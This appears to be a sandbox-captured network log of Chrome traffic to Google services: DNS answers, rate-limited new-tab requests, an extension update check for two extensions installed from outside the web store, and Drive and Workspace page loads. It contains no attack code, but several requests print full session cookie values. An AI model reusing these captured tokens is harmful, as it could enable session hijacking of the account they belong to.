216.58.212.234

content-autofill.googleapis.com

IN A

216.58.204.74

content-autofill.googleapis.com

IN A

142.250.200.42

content-autofill.googleapis.com

IN A

216.58.212.202

content-autofill.googleapis.com

IN A

172.217.169.74

content-autofill.googleapis.com

IN A

216.58.213.10
DNS

content-autofill.googleapis.com

NetworkService

Remote address:

8.8.8.8:53

Request

content-autofill.googleapis.com

IN A

Response

content-autofill.googleapis.com

IN A

216.58.212.234

content-autofill.googleapis.com

IN A

142.250.179.234

content-autofill.googleapis.com

IN A

142.250.178.10

content-autofill.googleapis.com

IN A

142.250.180.10

content-autofill.googleapis.com

IN A

216.58.201.106

content-autofill.googleapis.com

IN A

216.58.212.202

content-autofill.googleapis.com

IN A

172.217.169.74

content-autofill.googleapis.com

IN A

172.217.169.42

content-autofill.googleapis.com

IN A

172.217.169.10

content-autofill.googleapis.com

IN A

172.217.16.234

content-autofill.googleapis.com

IN A

142.250.187.234

content-autofill.googleapis.com

IN A

142.250.200.10

content-autofill.googleapis.com

IN A

142.250.200.42

content-autofill.googleapis.com

IN A

216.58.204.74

content-autofill.googleapis.com

IN A

142.250.187.202
GET

https://www.google.com/async/ddljson?async=ntp:2

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /async/ddljson?async=ntp:2 HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 429

date: Mon, 13 Jan 2025 18:02:38 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-store, no-cache, must-revalidate
content-type: text/html
server: HTTP server (unknown)
content-length: 3153
content-type: text/html
content-length: 3153
GET

https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
host: www.google.com
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/async/newtab_promos

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /async/newtab_promos HTTP/2.0
host: www.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGL2qlbwGIjAywPlHI8oZdjf7SJq5G05XJVqGN7daqF8RZoGEPF6RngOg_64BHiwVryU59DQZH3kyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGL2qlbwGIjAywPlHI8oZdjf7SJq5G05XJVqGN7daqF8RZoGEPF6RngOg_64BHiwVryU59DQZH3kyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/async/ddljson?async=ntp:2

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /async/ddljson?async=ntp:2 HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 429

date: Mon, 13 Jan 2025 18:02:41 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-store, no-cache, must-revalidate
content-type: text/html
server: HTTP server (unknown)
content-length: 3135
content-type: text/html
content-length: 3135
GET

https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
host: www.google.com
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/async/newtab_promos

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /async/newtab_promos HTTP/2.0
host: www.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGMGqlbwGIjCDdTCTwFVQ-0CLtN9tWcRSdDA8kvKNt9opipeJDt2yLJk6TJJjvQOeEYrDdi0GilsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS117BTGMGqlbwGIjCDdTCTwFVQ-0CLtN9tWcRSdDA8kvKNt9opipeJDt2yLJk6TJJjvQOeEYrDdi0GilsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
host: www.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGMGqlbwGIjD0H-Qku2yUBX6Y8K7YBcFOiToynwizSizs2JPcixPGNSkgcORZjWt1sQvDkZmECl8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

chrome.exe

Remote address:

142.250.187.196:443

Request

GET /sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS117BTGMGqlbwGIjD0H-Qku2yUBX6Y8K7YBcFOiToynwizSizs2JPcixPGNSkgcORZjWt1sQvDkZmECl8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D98%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D98%2526e%253D1

chrome.exe

Remote address:

142.250.187.238:443

Request

GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.82.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D98%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D98%2526e%253D1 HTTP/2.0
host: clients2.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
GET

https://clients2.googleusercontent.com/crx/blobs/AcmIXbpGoRruM6Rg2pdHIUfNGnvAwJcqpFoWJV4Xd6PeYFnv5YpJ0-GVzjWL6XpCDzrg9cVo2bTwfPVau85UdyeFfZQe-rOdS7oyguq-391NmfeQd9WZZkjpgIbL1I5KKEcAxlKa5Z8JDrufy52udyO9TokqhOw4Sbnj/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx

chrome.exe

Remote address:

142.250.200.33:443

Request

GET /crx/blobs/AcmIXbpGoRruM6Rg2pdHIUfNGnvAwJcqpFoWJV4Xd6PeYFnv5YpJ0-GVzjWL6XpCDzrg9cVo2bTwfPVau85UdyeFfZQe-rOdS7oyguq-391NmfeQd9WZZkjpgIbL1I5KKEcAxlKa5Z8JDrufy52udyO9TokqhOw4Sbnj/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/2.0
host: clients2.googleusercontent.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://drive.google.com/

chrome.exe

Remote address:

172.217.169.78:443

Request

GET / HTTP/2.0
host: drive.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua-arch: "x86"
sec-ch-ua-platform-version: "14.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
x-client-data: CJ/1ygE=
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
GET

https://accounts.google.com/ServiceLogin?service=wise&passive=1209600&osid=1&continue=https://drive.google.com/&followup=https://drive.google.com/&emr=1

chrome.exe

Remote address:

142.251.173.84:443

Request

GET /ServiceLogin?service=wise&passive=1209600&osid=1&continue=https://drive.google.com/&followup=https://drive.google.com/&emr=1 HTTP/2.0
host: accounts.google.com
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform-version: "14.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
x-client-data: CJ/1ygE=
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://accounts.google.com/ServiceLogin?service=wise&passive=1209600&osid=1&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto&followup=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto

chrome.exe

Remote address:

142.251.173.84:443

Request

GET /ServiceLogin?service=wise&passive=1209600&osid=1&continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto&followup=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto HTTP/2.0
host: accounts.google.com
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
x-client-data: CJ/1ygE=
sec-fetch-site: same-site
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "123.0.6312.123"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "14.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
cookie: __Host-GAPS=1:XKA6Cc0llHAj6Y1YMKRYemxh-28Xaw:bFuMcehr_mwbpfuI
GET

https://accounts.google.com/InteractiveLogin?continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto&followup=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto&osid=1&passive=1209600&service=wise&ifkv=AVdkyDnaxoWZG4OR-vMlB1KbQquaGFXzgaZSh30TRObTsdv0L7xCHI9egjANw6Paetc4DxzUgI4w

chrome.exe

Remote address:

142.251.173.84:443

Request

GET /InteractiveLogin?continue=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto&followup=https://drive.google.com/drive/?dmr%3D1%26ec%3Dwgc-drive-globalnav-goto&osid=1&passive=1209600&service=wise&ifkv=AVdkyDnaxoWZG4OR-vMlB1KbQquaGFXzgaZSh30TRObTsdv0L7xCHI9egjANw6Paetc4DxzUgI4w HTTP/2.0
host: accounts.google.com
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
x-client-data: CJ/1ygE=
sec-fetch-site: same-site
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-full-version: "123.0.6312.123"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform: "Windows"
sec-ch-ua-platform-version: "14.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
cookie: __Host-GAPS=1:XKA6Cc0llHAj6Y1YMKRYemxh-28Xaw:bFuMcehr_mwbpfuI
GET

https://workspace.google.com/intl/en-US/products/drive/

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /intl/en-US/products/drive/ HTTP/2.0
host: workspace.google.com
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-ch-ua-arch: "x86"
sec-ch-ua-platform-version: "14.0.0"
sec-ch-ua-model: ""
sec-ch-ua-bitness: "64"
sec-ch-ua-wow64: ?0
sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
x-client-data: CJ/1ygE=
sec-fetch-site: none
sec-fetch-mode: navigate
sec-fetch-user: ?1
sec-fetch-dest: document
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/0d962dee.css

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/0d962dee.css HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: text/css,*/*;q=0.1
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/426a67ed.css

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/426a67ed.css HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: text/css,*/*;q=0.1
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/2bbaf8c6.css

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/2bbaf8c6.css HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: text/css,*/*;q=0.1
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/426a67ed2.css

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/426a67ed2.css HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: text/css,*/*;q=0.1
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://workspace.google.com/assets/f261be23.css

chrome.exe

Remote address:

142.250.200.46:443

Request

GET /assets/f261be23.css HTTP/2.0
host: workspace.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: text/css,*/*;q=0.1
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://workspace.google.com/intl/en-US/products/drive/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
